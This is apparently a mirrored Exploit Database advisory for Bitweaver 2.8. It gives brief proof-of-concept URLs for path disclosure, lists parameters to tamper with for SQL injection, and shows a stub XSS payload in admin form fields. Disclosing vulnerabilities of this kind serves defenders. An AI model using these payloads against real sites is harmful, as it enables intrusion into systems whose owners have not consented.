Bitweaver 2.8.0 – Multiple Vulnerabilities

Exploit Database
59 阅读

作者： lemlajt

日期： 2011-03-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/16267/

# exploit title: Path Disclosure bitweaver 2.8
# date: 25.o2.2o11
# author: lemlajt
# software : bitweaver
# version: 2.8
# tested on: linux
# cve :
#

Path Disclosure bitweaver 2.8
PoC :
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?page=%27

sql injection in bitweaver 2.8
PoC :
1. Goto:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/quicktags/admin/admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc

2. Data Tamper:
$find = ' sql
$sort_mode =
$format_guid =
$list_page =


bonus: xss
POST
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php
?
$liberty_textarea_height = "><...>
$liberty_textarea_width = "><script>here</script>

# *

last Exploits
Bitweaver 2.8.0 – Multiple Vulnerabilities的更多信息

Spotweb 1.4.9 – DOM Based Cross-Site Scripting (XSS)：
Joomla! Component Advertising 0.25 – Local File Inclusion：
Netis E1+ 1.2.32533 – Backdoor Account (root)：
GitLab 11.4.7 – RCE (Authenticated) (2)：
Pandora Fms 3.1 – SQL Injection：
Joomla! Component com_ongallery – SQL Injection：
PLC Wireless Router GPN2.4P21-C-CN – Cross-Site Request Forgery：
Dolibarr ERP-CRM 12.0.3 – Remote Code Execution (Authenticated)：